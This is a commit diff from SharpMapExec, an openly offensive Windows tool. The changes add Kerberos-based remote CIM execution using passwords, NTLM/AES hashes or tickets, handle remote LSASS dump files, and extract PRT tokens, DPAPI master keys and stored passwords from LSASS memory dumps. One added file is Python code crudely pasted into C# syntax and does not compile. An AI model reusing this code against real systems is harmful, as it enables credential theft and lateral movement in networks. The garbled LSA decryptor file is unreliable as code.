STRLCPY/SharpMapExec

minidump update, smaller improvements
cube0x0 committed 3 years ago

888a3072

1 parent c3a8e0ba

.vs/SharpMapExec/v16/.suo

Binary file.

■ ■ ■ ■ ■ ■

SharpMapExec/Args/Info.cs

		skipped 9 lines
10	10
11	11		//Cim
12	12		Console.WriteLine("\r\n --- Cim ---");
	13	+	Console.WriteLine(@" Need plaintext password or the /impersonate flag");
13	14		Console.WriteLine(@" SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET");
14	15		Console.WriteLine("\n Available Cim modules");
15	16		Console.WriteLine(@" /m:enable_winrm (Runs Enable-PSRemoting -Force)");
		skipped 47 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmCim.cs

1		-	using System;
	1	+	using Microsoft.Management.Infrastructure;
	2	+	using SharpMapExec.Lib;
	3	+	using System;
2	4		using System.Collections.Generic;
3	5		using System.IO;
4	6		using static SharpMapExec.Helpers.SecurityContext;
		skipped 132 lines
137	139		return;
138	140		}
139	141
140		-	if (password.Cleartext != null)
	142	+	if (flags.Contains("impersonate"))
	143	+	{
	144	+	foreach (string computername in computernames)
	145	+	{
	146	+	CimSession cimSession;
	147	+	cimSession = Cim.newSession(computername, "", "", "", true);
	148	+	Scan.CIM(cimSession, module);
	149	+	}
	150	+	}
	151	+	else if (password.Cleartext != null)
141	152		{
142	153		Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "cim");
143	154		}
144	155		else
145	156		{
146		-	Console.WriteLine("[-] Need clear-text password for cim");
	157	+	Console.WriteLine("[-] Need plaintext password or /impersonate for cim");
147	158		return;
148	159		}
149	160		}
		skipped 2 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosCim.cs

1	+	using Microsoft.Management.Infrastructure;
2	+	using Rubeus;
3	+	using SharpMapExec.Lib;
4	+	using System;
5	+	using System.Collections.Generic;
6	+	using System.IO;
7	+
8	+	namespace SharpMapExec.Commands
9	+	{
10	+	public class kerberosCim : ICommand
11	+	{
12	+	public static string CommandName => "kerberoscim";
13	+
14	+	public void Execute(Dictionary<string, string> arguments)
15	+	{
16	+	string[] users = { };
17	+	string domain = "";
18	+	string path = "";
19	+	string destination = "";
20	+	string[] passwords = { };
21	+	string[] hashes = { };
22	+	string dc = "";
23	+	string ticket = "";
24	+	Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
25	+	string[] computernames;
26	+	string module = "";
27	+	string moduleargument = "";
28	+	List<string> flags = new List<string>();
29	+
30	+
31	+	if (arguments.ContainsKey("/m"))
32	+	{
33	+	module = arguments["/m"];
34	+	}
35	+	if (arguments.ContainsKey("/module"))
36	+	{
37	+	module = arguments["/module"];
38	+	}
39	+
40	+	//
41	+	if (arguments.ContainsKey("/user"))
42	+	{
43	+	if (File.Exists(arguments["/user"]))
44	+	{
45	+	users = File.ReadAllLines(arguments["/user"]);
46	+	}
47	+	else
48	+	{
49	+	string[] parts = arguments["/user"].Split('\\');
50	+	if (parts.Length == 2)
51	+	{
52	+	domain = parts[0];
53	+	users = parts[1].Split(',');
54	+	}
55	+	else
56	+	{
57	+	users = arguments["/user"].Split(',');
58	+	}
59	+	}
60	+	}
61	+
62	+	if (arguments.ContainsKey("/domain"))
63	+	{
64	+	domain = arguments["/domain"];
65	+	}
66	+	if (arguments.ContainsKey("/dc"))
67	+	{
68	+	dc = arguments["/dc"];
69	+	}
70	+	if (arguments.ContainsKey("/ticket"))
71	+	{
72	+	ticket = arguments["/ticket"];
73	+	}
74	+
75	+	if (arguments.ContainsKey("/computername"))
76	+	{
77	+	if (File.Exists(arguments["/computername"]))
78	+	{
79	+	computernames = File.ReadAllLines(arguments["/computername"]);
80	+	}
81	+	else
82	+	{
83	+	computernames = arguments["/computername"].Split(',');
84	+	}
85	+	}
86	+	else
87	+	{
88	+	Console.WriteLine("[-] /computername must be supplied!");
89	+	return;
90	+	}
91	+
92	+	if (arguments.ContainsKey("/encType"))
93	+	{
94	+	string encTypeString = encType.ToString().ToUpper();
95	+
96	+	if (encTypeString.Equals("RC4") \|\| encTypeString.Equals("NTLM"))
97	+	{
98	+	encType = Interop.KERB_ETYPE.rc4_hmac;
99	+	}
100	+	else if (encTypeString.Equals("AES128"))
101	+	{
102	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
103	+	}
104	+	else if (encTypeString.Equals("AES256") \|\| encTypeString.Equals("AES"))
105	+	{
106	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
107	+	}
108	+	else if (encTypeString.Equals("DES"))
109	+	{
110	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
111	+	}
112	+	}
113	+	else
114	+	encType = Interop.KERB_ETYPE.rc4_hmac;
115	+
116	+	if (arguments.ContainsKey("/password"))
117	+	{
118	+	if (File.Exists(arguments["/password"]))
119	+	passwords = File.ReadAllLines(arguments["/password"]);
120	+	else
121	+	passwords = arguments["/password"].Split(',');
122	+	}
123	+	else if (arguments.ContainsKey("/des"))
124	+	{
125	+	if (File.Exists(arguments["/des"]))
126	+	hashes = File.ReadAllLines(arguments["/des"]);
127	+	else
128	+	hashes = arguments["/des"].Split(',');
129	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
130	+	}
131	+	else if (arguments.ContainsKey("/rc4"))
132	+	{
133	+	if (File.Exists(arguments["/rc4"]))
134	+	hashes = File.ReadAllLines(arguments["/rc4"]);
135	+	else
136	+	hashes = arguments["/rc4"].Split(',');
137	+	encType = Interop.KERB_ETYPE.rc4_hmac;
138	+	}
139	+	else if (arguments.ContainsKey("/ntlm"))
140	+	{
141	+	if (File.Exists(arguments["/ntlm"]))
142	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
143	+	else
144	+	hashes = arguments["/ntlm"].Split(',');
145	+	encType = Interop.KERB_ETYPE.rc4_hmac;
146	+	}
147	+	else if (arguments.ContainsKey("/aes128"))
148	+	{
149	+	hashes = arguments["/aes128"].Split(',');
150	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
151	+	}
152	+	else if (arguments.ContainsKey("/aes256"))
153	+	{
154	+	hashes = arguments["/aes256"].Split(',');
155	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
156	+	}
157	+
158	+	if (users.Length == 0 && String.IsNullOrEmpty(ticket))
159	+	{
160	+	Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
161	+	return;
162	+	}
163	+	if (String.IsNullOrEmpty(domain) && String.IsNullOrEmpty(ticket))
164	+	{
165	+	Console.WriteLine("\r\n[X] You must supply a domain!\r\n");
166	+	return;
167	+	}
168	+
169	+	if ((hashes.Length == 0 && passwords.Length == 0) && String.IsNullOrEmpty(ticket))
170	+	{
171	+	Console.WriteLine("\r\n[X] You must supply a /password , or a [/des\|/rc4\|/aes128\|/aes256] hash!\r\n");
172	+	return;
173	+	}
174	+
175	+	if (String.IsNullOrEmpty(ticket) && (!((encType == Interop.KERB_ETYPE.des_cbc_md5) \|\| (encType == Interop.KERB_ETYPE.rc4_hmac) \|\| (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) \|\| (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))))
176	+	{
177	+	Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
178	+	return;
179	+	}
180	+
181	+	foreach (string computername in computernames)
182	+	{
183	+	CimSession cimSession;
184	+	cimSession = Cim.newSession(computername, "", "", "", true);
185	+	Scan.CIM(cimSession, module);
186	+	}
187	+	}
188	+	}
189	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Cim.cs

		skipped 17 lines
18	18		public static CimSession newSession(string computername, string domain, string username, string password, bool impersonate = false)
19	19		{
20	20		CimSession cimSession;
21		-
22	21		if (impersonate)
23	22		{
24		-	DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Default };
	23	+	DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Impersonate };
25	24		cimSession = CimSession.Create(computername, options);
26	25		}
27	26		else
		skipped 216 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Reg32.cs

		skipped 59 lines
60	60		try
61	61		{
62	62		RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
63		-	string value = (string)environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
	63	+	var value = environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
64	64		environmentKey.Close();
65		-	return value;
	65	+	return value.ToString();
66	66		}
67	67		catch (System.UnauthorizedAccessException e)
68	68		{
		skipped 92 lines
161	161		}
162	162
163	163		string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
164		-	Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
	164	+	Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
165	165
166	166		if(value == "0")
167	167		{
		skipped 30 lines
198	198		}
199	199
200	200		string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
201		-	Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
	201	+	Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
202	202
203	203		}
204	204		}
		skipped 3 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Wsman.cs

		skipped 406 lines
407	407		{
408	408		Console.WriteLine("[-] Failed to Copy Lsass Dump File");
409	409		}
	410	+	try
	411	+	{
	412	+	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
	413	+	}
	414	+	catch
	415	+	{
	416	+	Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
	417	+	}
410	418		}
411	419		catch
412	420		{
413	421		Console.WriteLine("[-] Failed to Dump Lsass");
414		-	}
415		-	try
416		-	{
417		-	(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
418		-	}
419		-	catch
420		-	{
421		-	Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
422	422		}
423	423		}
424	424
		skipped 246 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Cloudap_.cs

		skipped 47 lines
48	48		byte[] prtBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.PRT), (int)cacheEntry.cbPRT);
49	49		var DecryptedPRTBytes = BCrypt.DecryptCredentials(prtBytes, minidump.lsakeys);
50	50		string PRT = Encoding.ASCII.GetString(DecryptedPRTBytes.Skip(25).ToArray());
51		-
52	51		cloudapentry.PRT = PRT;
53		-	}
54	52
55		-	if (cacheEntry.toDetermine != 0)
56		-	{
57		-	byte[] cacheunkBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.toDetermine), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_UNK)));
58		-	KIWI_CLOUDAP_CACHE_UNK cacheunk = ReadStruct<KIWI_CLOUDAP_CACHE_UNK>(cacheunkBytes);
59		-	var DecryptedDpapiBytes = BCrypt.DecryptCredentials(cacheunk.unk, minidump.lsakeys);
	53	+
	54	+	if (cacheEntry.toDetermine != 0)
	55	+	{
	56	+	byte[] cacheunkBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.toDetermine), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_UNK)));
	57	+	KIWI_CLOUDAP_CACHE_UNK cacheunk = ReadStruct<KIWI_CLOUDAP_CACHE_UNK>(cacheunkBytes);
	58	+	var DecryptedDpapiBytes = BCrypt.DecryptCredentials(cacheunk.unk, minidump.lsakeys);
60	59
61		-	string key_guid = cacheunk.guid.ToString();
62		-	string dpapi_key = BitConverter.ToString(DecryptedDpapiBytes).Replace("-", "");
63		-	string dpapi_key_sha1 = BCrypt.GetHashSHA1(DecryptedDpapiBytes);
	60	+	string key_guid = cacheunk.guid.ToString();
	61	+	string dpapi_key = BitConverter.ToString(DecryptedDpapiBytes).Replace("-", "");
	62	+	string dpapi_key_sha1 = BCrypt.GetHashSHA1(DecryptedDpapiBytes);
64	63
65		-	cloudapentry.key_guid = key_guid;
66		-	cloudapentry.dpapi_key = dpapi_key;
67		-	cloudapentry.dpapi_key_sha = dpapi_key_sha1;
68		-	}
	64	+	cloudapentry.key_guid = key_guid;
	65	+	cloudapentry.dpapi_key = dpapi_key;
	66	+	cloudapentry.dpapi_key_sha = dpapi_key_sha1;
	67	+	}
69	68
70		-	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
71		-	if (currentlogon == null)
72		-	{
73		-	currentlogon = new Logon(luid)
	69	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
	70	+	if (currentlogon == null)
74	71		{
75		-	//UserName = username,
76		-	Cloudap = new List<Cloudap>()
77		-	};
78		-	currentlogon.Cloudap.Add(cloudapentry);
79		-	minidump.logonlist.Add(currentlogon);
80		-	}
81		-	else
82		-	{
83		-	currentlogon.Cloudap = new List<Cloudap>();
84		-	currentlogon.Cloudap.Add(cloudapentry);
	72	+	currentlogon = new Logon(luid)
	73	+	{
	74	+	//UserName = username,
	75	+	Cloudap = new List<Cloudap>()
	76	+	};
	77	+	currentlogon.Cloudap.Add(cloudapentry);
	78	+	minidump.logonlist.Add(currentlogon);
	79	+	//continue;
	80	+	}
	81	+	else
	82	+	{
	83	+	currentlogon.Cloudap = new List<Cloudap>();
	84	+	currentlogon.Cloudap.Add(cloudapentry);
	85	+	}
85	86		}
86	87
87	88		llCurrent = log.Flink;
		skipped 6 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Credman.cs

		skipped 24 lines
25	25		minidump.fileBinaryReader.BaseStream.Seek(credmanMem, 0);
26	26		var credmansetBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(template.list_entry));
27	27
28		-	int list1offset = StructFieldOffset(typeof(KIWI_CREDMAN_SET_LIST_ENTRY), "list1");//bug
29		-	long pList1 = BitConverter.ToInt64(credmansetBytes, list1offset);
	28	+	//int list1offset = StructFieldOffset(typeof(KIWI_CREDMAN_SET_LIST_ENTRY), "list1");//bug
	29	+	long pList1 = BitConverter.ToInt64(credmansetBytes, FieldOffset<KIWI_CREDMAN_SET_LIST_ENTRY>("list1"));
30	30		long refer = pList1 + FieldOffset<KIWI_CREDMAN_LIST_STARTER>("start");
31	31
32	32		minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, pList1), 0);
		skipped 8 lines
41	41		continue;
42	42
43	43		llCurrent = pStart;
44		-	llCurrent = llCurrent - FieldOffset<KIWI_CREDMAN_LIST_ENTRY>("Flink");
	44	+
45	45
46	46		do
47	47		{
	48	+	llCurrent = llCurrent - FieldOffset<KIWI_CREDMAN_LIST_ENTRY>("Flink");
48	49		llCurrent = Rva2offset(minidump, llCurrent);
	50	+
49	51		if (llCurrent == 0)
50	52		continue;
51	53
		skipped 42 lines
94	96
95	97		if (credmanentry.Password != null)
96	98		{
97		-	var currentlogon = minidump.logonlist.FirstOrDefault(x =>
98		-	x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
	99	+	var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
99	100		if (currentlogon == null)
100	101		{
101	102		currentlogon = new Logon(luid);
102		-	currentlogon.UserName = username;
	103	+	//currentlogon.UserName = username;
103	104		currentlogon.Credman = new List<CredMan>();
104	105		currentlogon.Credman.Add(credmanentry);
105	106		minidump.logonlist.Add(currentlogon);
		skipped 20 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/Dpapi_.cs

		skipped 18 lines
19	19		if (position == 0)
20	20		continue;
21	21
22		-	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader,
23		-	(position + template.first_entry_offset), minidump.sysinfo);
	22	+	var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
24	23		long ptr_entry = ReadInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
25	24
26	25		llcurrent = ptr_entry;
		skipped 4 lines
31	30
32	31		dpapi.KIWI_MASTERKEY_CACHE_ENTRY dpapiEntry = ReadStruct<dpapi.KIWI_MASTERKEY_CACHE_ENTRY>(entryBytes);
33	32		//PrintProperties(dpapiEntry);
34		-
35		-	byte[] dec_masterkey = BCrypt.DecryptCredentials(dpapiEntry.key, minidump.lsakeys);
36		-	Dpapi dpapi = new Dpapi();
37		-	//dpapi.luid = $"{dpapiEntry.LogonId.HighPart}:{dpapiEntry.LogonId.LowPart}";
38		-	dpapi.masterkey = BitConverter.ToString(dec_masterkey).Replace("-", "");
39		-	dpapi.insertTime = $"{ToDateTime(dpapiEntry.insertTime):yyyy-MM-dd HH:mm:ss}";
40		-	dpapi.key_size = dpapiEntry.keySize.ToString();
41		-	dpapi.key_guid = dpapiEntry.KeyUid.ToString();
42		-	dpapi.masterkey_sha = BCrypt.GetHashSHA1(dec_masterkey);
43		-
44		-	Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == dpapiEntry.LogonId.HighPart && x.LogonId.LowPart == dpapiEntry.LogonId.LowPart);
45	33
46	34		if (dpapiEntry.keySize > 1)
47	35		{
48		-	if (currentlogon == null)
	36	+	byte[] dec_masterkey = BCrypt.DecryptCredentials(dpapiEntry.key, minidump.lsakeys);
	37	+	Dpapi dpapi = new Dpapi();
	38	+	//dpapi.luid = $"{dpapiEntry.LogonId.HighPart}:{dpapiEntry.LogonId.LowPart}";
	39	+	dpapi.masterkey = BitConverter.ToString(dec_masterkey).Replace("-", "");
	40	+	dpapi.insertTime = $"{ToDateTime(dpapiEntry.insertTime):yyyy-MM-dd HH:mm:ss}";
	41	+	dpapi.key_size = dpapiEntry.keySize.ToString();
	42	+	dpapi.key_guid = dpapiEntry.KeyUid.ToString();
	43	+	dpapi.masterkey_sha = BCrypt.GetHashSHA1(dec_masterkey);
	44	+
	45	+	Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == dpapiEntry.LogonId.HighPart && x.LogonId.LowPart == dpapiEntry.LogonId.LowPart);
	46	+	if (currentlogon == null && !dpapi.insertTime.Contains("1601-01-01"))
49	47		{
50	48		currentlogon = new Logon(dpapiEntry.LogonId);
51		-	//currentlogon.UserName = username;
52	49		currentlogon.Dpapi = new List<Dpapi>();
53	50		currentlogon.Dpapi.Add(dpapi);
54	51		minidump.logonlist.Add(currentlogon);
		skipped 18 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/LogonSessions.cs

		skipped 157 lines
158	158		"CachedUnlock"
159	159		};
160	160
161		-	public static List<Logon> FindSessions(Program.MiniDump minidump, msv.MsvTemplate template)
	161	+	public static List<Logon> FindSessions(Program.MiniDump minidump, msv.MsvTemplate template, int ptr_entry_offset = 1)
162	162		{
163		-	//Minidump.PrintProperties(template);
	163	+	//PrintProperties(template);
164	164
165	165		List<Logon> logonlist = new List<Logon>();
166	166		List<long> offsetlist = new List<long>();
		skipped 5 lines
172	172		return logonlist;
173	173		}
174	174
175		-	long logonSessionOffset = (long)get_ptr_with_offset(minidump.fileBinaryReader, (logonSessionListSignOffset + template.LogonSessionListCountOffset), minidump.sysinfo);
176		-	int logonSessionListCount = ReadInt32(minidump.fileBinaryReader, logonSessionOffset);
	175	+	ulong logonSessionOffset = get_ptr_with_offset(minidump.fileBinaryReader, (logonSessionListSignOffset + template.LogonSessionListCountOffset), minidump.sysinfo);
	176	+	uint logonSessionListCount = ReadInt8(minidump.fileBinaryReader, (long)logonSessionOffset);
177	177
	178	+	//Console.WriteLine($"logonSessionOffset {(Int32)logonSessionOffset}");
178	179		//Console.WriteLine($"Parsing {logonSessionListCount} logon sessions");
	180	+
	181	+	long offset = logonSessionListSignOffset + template.first_entry_offset;
	182	+	long listMemOffset = ReadInt32(minidump.fileBinaryReader, logonSessionListSignOffset + template.first_entry_offset);
	183	+	long ptr_entry_loc = offset + sizeof(int) + listMemOffset;
	184	+
179	185		for (var i = 0; i < logonSessionListCount; i++)
180	186		{
	187	+	long listentry;
	188	+	long entry_ptr;
	189	+	long pos;
181	190		//Console.WriteLine($"Parsing session {i}");
182		-	long offset = logonSessionListSignOffset + template.first_entry_offset;
183		-	long listMemOffset = ReadInt32(minidump.fileBinaryReader, offset);
184		-	long tmp_offset = (int)offset + sizeof(int) + (int)listMemOffset + (16 * i);
185		-	var voffset = ReadInt64(minidump.fileBinaryReader, tmp_offset);
186		-	long current = Rva2offset(minidump, voffset);
	191	+
	192	+	entry_ptr = ptr_entry_loc + (16 * i);
	193	+	listentry = ReadInt64(minidump.fileBinaryReader, entry_ptr);
	194	+	//offsetlist.Add(listentry);
	195	+	if (entry_ptr == listentry)
	196	+	continue;
	197	+
	198	+	pos = entry_ptr;
187	199
	200	+	int count = 0;
188	201		do
189	202		{
190		-	long listentry = ReadInt64(minidump.fileBinaryReader, current);
191		-	listentry = Rva2offset(minidump, listentry);
	203	+	listentry = Rva2offset(minidump, ReadInt64(minidump.fileBinaryReader, pos));
	204	+	//Console.WriteLine($"listentry {listentry}");
	205	+
	206	+	count++;
	207	+	if (count >= 255)
	208	+	return null;
192	209
193	210		if (listentry == 0)
194	211		break;
195		-	if (offsetlist.Contains((listentry + template.LocallyUniqueIdentifierOffset)))
	212	+
	213	+	if (offsetlist.Contains((listentry)))
196	214		{
197	215		break;
198	216		}
	217	+	offsetlist.Add(listentry);
	218	+
199	219
200	220		KIWI_BASIC_SECURITY_LOGON_SESSION_DATA logonsession = new KIWI_BASIC_SECURITY_LOGON_SESSION_DATA();
201		-
202		-	offsetlist.Add(listentry + template.LocallyUniqueIdentifierOffset);
203	221		logonsession.LogonId = listentry + template.LocallyUniqueIdentifierOffset;
204	222		logonsession.LogonType = ReadInt32(minidump.fileBinaryReader, listentry + template.LogonTypeOffset);
205	223		logonsession.Session = ReadInt32(minidump.fileBinaryReader, listentry + template.SessionOffset);
		skipped 38 lines
244	262		//Console.WriteLine("session " + logon.Session + " luid " + logon.LogonId.LowPart + " username " + logon.UserName + " pCredentials " + logonsession.pCredentials);
245	263		//PrintProperties(logon);
246	264		logonlist.Add(logon);
247		-
248		-	voffset = ReadInt64(minidump.fileBinaryReader, listentry);
249		-	current = Rva2offset(minidump, voffset);
	265	+	pos = Rva2offset(minidump, ReadInt64(minidump.fileBinaryReader, pos));
	266	+	//Console.WriteLine(pos);
250	267		} while (true);
251	268		}
252	269
		skipped 19 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Decryptor/lsadecryptor_lsa_decryptor_nt5.cs

1	+	using System;
2	+
3	+	using System.Linq;
4	+
5	+	namespace Minidump.Decryptor
6	+	{
7	+
8	+	public class LsaDecryptor_NT5
9	+
10	+	public object decryptor_template;
11	+
12	+	public object des_key;
13	+
14	+	public object feedback;
15	+
16	+	public object feedback_offset;
17	+
18	+	public object random_key;
19	+
20	+	public LsaDecryptor_NT5(object reader, object decryptor_template, object sysinfo)
21	+	: base(null, sysinfo, reader) {
22	+	decryptor_template = decryptor_template;
23	+	feedback;
24	+	feedback_offset;
25	+	des_key;
26	+	random_key;
27	+	acquire_crypto_material();
28	+	}
29	+
30	+	public virtual object acquire_crypto_material() {
31	+	Console.WriteLine("Acquireing crypto stuff...");
32	+	var sigpos = find_signature();
33	+	reader.move(sigpos);
34	+	//data = self.reader.peek(0x50)
35	+	//self.Console.WriteLine('Memory looks like this around the signature\n%s' % hexdump(data, start = sigpos))
36	+	foreach (var x in new List<object> {
37	+	decryptor_template.feedback_ptr_offset,
38	+	decryptor_template.old_feedback_offset
39	+	}) {
40	+	feedback_offset = x;
41	+	try {
42	+	feedback = get_feedback(sigpos);
43	+	//self.Console.WriteLine('Feedback bytes:\n%s' % hexdump(self.feedback, start = 0))
44	+	des_key = get_key(sigpos);
45	+	random_key = get_random(sigpos);
46	+	//self.Console.WriteLine('randomkey bytes:\n%s' % hexdump(self.random_key, start = 0))
47	+	} catch {
48	+	traceback.print_exc();
49	+	input();
50	+	}
51	+	}
52	+	}
53	+
54	+	public virtual object get_feedback(object sigpos) {
55	+	if (decryptor_template.arch == "x86") {
56	+	var new_ptr = reader.get_ptr_with_offset(sigpos + feedback_offset);
57	+	reader.move(new_ptr);
58	+	return reader.read(8);
59	+	} else {
60	+	reader.move(sigpos + feedback_offset);
61	+	var offset = LONG(reader).value;
62	+	var newpos = sigpos + feedback_offset + 4 + offset;
63	+	reader.move(newpos);
64	+	return reader.read(8);
65	+	}
66	+	}
67	+
68	+	public virtual object get_key(object sigpos) {
69	+	object des_key;
70	+	object des_key_ptr;
71	+	if (decryptor_template.arch == "x86") {
72	+	var new_ptr = reader.get_ptr_with_offset(sigpos + decryptor_template.desx_key_ptr_offset);
73	+	reader.move(new_ptr);
74	+	des_key_ptr = decryptor_template.key_struct_ptr(reader);
75	+	des_key = des_key_ptr.read(reader);
76	+	} else {
77	+	reader.move(sigpos + decryptor_template.desx_key_ptr_offset);
78	+	var offset = LONG(reader).value;
79	+	var newpos = sigpos + decryptor_template.desx_key_ptr_offset + 4 + offset;
80	+	reader.move(newpos);
81	+	des_key_ptr = decryptor_template.key_struct_ptr(reader);
82	+	des_key = des_key_ptr.read(reader);
83	+	}
84	+	return des_key;
85	+	}
86	+
87	+	public virtual object get_random(object sigpos) {
88	+	if (decryptor_template.arch == "x86") {
89	+	var random_key_ptr = reader.get_ptr_with_offset(sigpos + decryptor_template.randomkey_ptr_offset);
90	+	random_key_ptr = reader.get_ptr_with_offset(random_key_ptr);
91	+	reader.move(random_key_ptr);
92	+	} else {
93	+	reader.move(sigpos + decryptor_template.randomkey_ptr_offset);
94	+	var offset = LONG(reader).value;
95	+	var newpos = sigpos + decryptor_template.desx_key_ptr_offset + 4 + offset;
96	+	reader.move(newpos);
97	+	}
98	+	return reader.read(256);
99	+	}
100	+
101	+	public virtual object find_signature() {
102	+	Console.WriteLine("Looking for main struct signature in memory...");
103	+	var fl = reader.find_in_module("lsasrv.dll", decryptor_template.signature);
104	+	if (fl.Count == 0) {
105	+	logging.debug(String.Format("signature not found! %s", decryptor_template.signature.hex()));
106	+	throw new Exception("LSA signature not found!");
107	+	}
108	+	Console.WriteLine(String.Format("Found candidates on the following positions: %s", " ".join(from x in fl
109	+	select hex(x))));
110	+	Console.WriteLine(String.Format("Selecting first one @ 0x%08x", fl[0]));
111	+	return fl[0];
112	+	}
113	+
114	+	public virtual object decrypt(object encrypted) {
115	+	// TODO: NT version specific, move from here in subclasses.
116	+	var cleartext = new byte[] { };
117	+	var size = encrypted.Count;
118	+	if (size) {
119	+	if (size % 8 != 0) {
120	+	var ctx = RC4(random_key);
121	+	cleartext = ctx.decrypt(encrypted);
122	+	} else {
123	+	//print('Decryption not implemented!')
124	+	cleartext = @__desx_decrypt(encrypted);
125	+	//raise Exception('Not implemented!')
126	+	}
127	+	}
128	+	return cleartext;
129	+	}
130	+
131	+	public virtual object dump() {
132	+	Console.WriteLine("Recovered LSA encryption keys\n");
133	+	Console.WriteLine("Feedback ({}): {}".format(feedback.Count, feedback.hex()));
134	+	Console.WriteLine("Random Key ({}): {}".format(random_key.Count, random_key.hex()));
135	+	Console.WriteLine("DESX inputwhitening Key ({}): {}".format(des_key.inputWhitening.Count, des_key.inputWhitening.hex()));
136	+	Console.WriteLine("DESX outputwhitening Key ({}): {}".format(des_key.outputWhitening.Count, des_key.outputWhitening.hex()));
137	+	//self.Console.WriteLine('DESX DES Expanded Key ({}): {}' % (self.des_key.desKey.roundKey))
138	+	}
139	+
140	+	public virtual void @__desx_decrypt_internal_block(object chunk) {
141	+	chunk = xor(chunk, des_key.outputWhitening);
142	+	chunk = @__desx_internal_block(chunk, encrypt: false);
143	+	chunk = xor(chunk, des_key.inputWhitening);
144	+	return chunk;
145	+	}
146	+
147	+	public virtual object @__desx_decrypt(object data) {
148	+	var res = new byte[] { };
149	+	var i = 0;
150	+	var IV = feedback;
151	+	while (i != data.Count) {
152	+	var chunk = @__desx_decrypt_internal_block(data[i::(i + 8)]);
153	+	res += xor(chunk, IV);
154	+	IV = data[i::(i + 8)];
155	+	i += 8;
156	+	}
157	+	return res;
158	+	}
159	+
160	+	public virtual object @__desx_internal_block(object data, object encrypt = false) {
161	+	var L = @int.from_bytes(data[4], "little", signed: false);
162	+	var R = @int.from_bytes(data[::4], "little", signed: false);
163	+	//t = 'ORIGINAL L: %s R: %s' % (L,R)
164	+	//input(t)
165	+	//print(hex(R))
166	+	R = rol32(R, 4);
167	+	//input(hex(R))
168	+	var Ta = (L ^ R) & 0xf0f0f0f0;
169	+	//input('Ta ' + hex(Ta))
170	+	L = L ^ Ta;
171	+	R = R ^ Ta;
172	+	L = rol32(L, 20);
173	+	Ta = (L ^ R) & 0xfff0000f;
174	+	//input('Ta ' + hex(Ta))
175	+	L = L ^ Ta;
176	+	R = R ^ Ta;
177	+	L = rol32(L, 14);
178	+	Ta = (L ^ R) & 0x33333333;
179	+	//input('Ta ' + hex(Ta))
180	+	L = L ^ Ta;
181	+	R = R ^ Ta;
182	+	R = rol32(R, 22);
183	+	Ta = (L ^ R) & 0x03fc03fc;
184	+	//input('Ta ' + hex(Ta))
185	+	L = L ^ Ta;
186	+	R = R ^ Ta;
187	+	R = rol32(R, 9);
188	+	Ta = (L ^ R) & 0xaaaaaaaa;
189	+	//input('Ta ' + hex(Ta))
